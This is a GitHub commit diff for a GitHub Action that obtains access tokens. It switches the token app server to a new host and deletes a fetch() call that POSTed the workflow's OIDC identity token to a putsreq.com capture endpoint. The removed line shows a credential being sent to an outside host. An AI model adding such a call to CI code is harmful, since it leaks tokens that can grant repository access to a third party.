File tree Expand file tree Collapse file tree 2 files changed +5
-6
lines changed
Expand file tree Collapse file tree 2 files changed +5
-6
lines changed Original file line number Diff line number Diff line change @@ -73523,7 +73523,9 @@ function canonicalHeadersOf(headers) {
7352373523
7352473524const config_config = {
7352573525 appServer: {
73526- url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
73526+ url: new URL('https://github-actions-access-token.koyeb.app'),
73527+ // url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
73528+ // url: new URL('https://github-actions-access-token.netlify.app'),
7352773529 },
7352873530};
7352973531const appServerInput = getYamlInput('app-server');
@@ -73633,10 +73635,6 @@ async function getAccessToken(tokenRequest) {
7363373635 }
7363473636 throw error;
7363573637 });
73636- await fetch(`https://putsreq.com/aabrC4rHFk9suPn7tka0`, {
73637- method: 'POST',
73638- body: idTokenForAccessManager,
73639- });
7364073638 let requestSigner;
7364173639 if (config_config.appServer.auth) {
7364273640 if (config_config.appServer.auth.type === 'aws') {
Original file line number Diff line number Diff line change @@ -2,7 +2,8 @@ import {getYamlInput} from './github-actions-utils.js';
22
33export const config : Config = {
44 appServer : {
5- url : new URL ( 'https://github-actions-access-token.qoomon.workers.dev' ) ,
5+ url : new URL ( 'https://github-actions-access-token.koyeb.app' ) ,
6+ // url: new URL('https://github-actions-access-token.qoomon.workers.dev'),
67 // url: new URL('https://github-actions-access-token.netlify.app'),
78 } ,
89} ;
You can’t perform that action at this time.
0 commit comments